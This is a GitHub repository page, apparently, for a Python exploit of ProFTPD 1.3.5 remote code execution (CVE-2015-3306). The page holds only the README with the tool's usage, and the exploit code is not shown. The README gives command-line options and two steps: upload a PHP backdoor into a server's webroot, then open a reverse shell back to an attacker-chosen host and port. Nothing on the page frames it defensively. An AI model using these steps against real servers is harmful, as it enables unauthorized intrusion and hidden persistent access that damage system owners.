Skip to content

0xm4ud/ProFTPD_CVE-2015-3306

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 

Repository files navigation

(m4ud) ProFTPD 1.3.5 RCE exploit CVE : 2015-3306!

ProFTPd 1.3.5 RCE
Usage: ProFTPD.py [options]

Options:
  -h, --help             show this help message and exit
  -l LHOST, --lhost=LHOST
                         Local IP Required for Reverse Shell,
  -p LPORT, --lport=LPORT
                         Port Required for Reverse Shell,
  -t TARGET, --target=TARGET
                         Vulnerable Target,
  -d DIRECTORY, --dir=DIRECTORY
                         WebRoot directory to Upload Backdoor,  Default: /var/www/html
  -c COMMAND, --command=COMMAND
                         System Command,
  -f FILE, --file=FILE  
                         Backdoor Name,  Default: shell.php.

STEP 1 - Write Backdoor to target machine!

Usage: python3 exploit.py -t 10.x.x.x -f cmd.php -d '/var/www/html'

STEP 2 - Get Shell!!

Usage: python3 exploit.py -t 10.x.x.x --lhost 172.x.x.x --lport 4242

About

No description, website, or topics provided.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages